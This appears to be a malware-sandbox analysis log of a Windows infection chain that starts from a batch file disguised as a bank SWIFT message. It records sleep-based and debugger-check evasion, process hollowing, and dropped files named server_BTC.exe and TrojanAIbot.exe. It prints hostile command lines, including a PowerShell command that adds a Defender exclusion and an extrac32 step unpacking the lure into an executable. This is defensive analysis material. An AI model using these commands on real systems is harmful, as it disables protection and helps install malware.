                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99436s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99217s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98999s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98229s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -98103s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97984s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97868s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97620s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97503s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -97261s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199843s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199296s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988Thread sleep time: -1199187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8040Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A05908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02A05908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99730Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99622Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99474Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99149Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99031Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98921Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98812Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98697Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98358Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98249Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98030Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97921Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97811Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97697Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97582Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97343Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97085Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96852Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99778Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99662Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99418Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99305Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99198Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98949Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98829Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98714Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98595Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98458Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98331Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98087Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97840Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97276Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97134Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199936Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199727Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99866
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99745
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99623
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99394
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99138
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98961
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98831
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98708
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98580
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98452
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98339
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98227
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98116
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97975
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97848
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97712
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97600
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97490
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99888
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99776
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99634
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99301
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98802
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98606
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98475
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98258
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98120
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97972
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97845
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97717
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97457
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199670
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199498
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199073
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198713
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198561
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198403
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1198099
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197943
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197780
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197650
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197541
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197429
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197315
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197190
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1197077
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196967
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196858
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196748
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196639
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196529
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196346
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1196101
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195982
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195872
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195765
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195654
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195546
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195435
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195326
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195218
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1195105
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194999
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194886
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194780
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1194671
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99856
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99712
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99584
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99457
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99341
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99233
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99120
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99006
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98882
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98773
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98662
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98538
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98427
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98304
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98023
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97911
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97788
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97678
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97554
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97443
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99763
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99544
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99436
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99217
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99109
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98999
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98781
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98672
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98562
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98453
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98343
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98229
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98103
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97984
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97868
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97750
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97620
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97503
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97375
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97261
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199843
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199515
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199296
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199187
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000004.00000002.1509390491.0000000000609000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
                      Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1509390491.0000000000609000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                      Source: Wisrysxl.PIF, 0000001A.00000002.1650786001.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001E.00000002.1733160037.000000000065F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-38013
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end nodegraph_26-27221
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02A1F744
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02A1894C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h]12_1_004BF794
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 27_1_004BF794 mov eax, dword ptr fs:[00000030h]27_1_004BF794
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004015D7 SetUnhandledExceptionFilter,12_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004015D7 SetUnhandledExceptionFilter,12_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 27_1_004015D7 SetUnhandledExceptionFilter,27_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 27_1_004015D7 SetUnhandledExceptionFilter,27_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 327008Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 346008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 386008
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
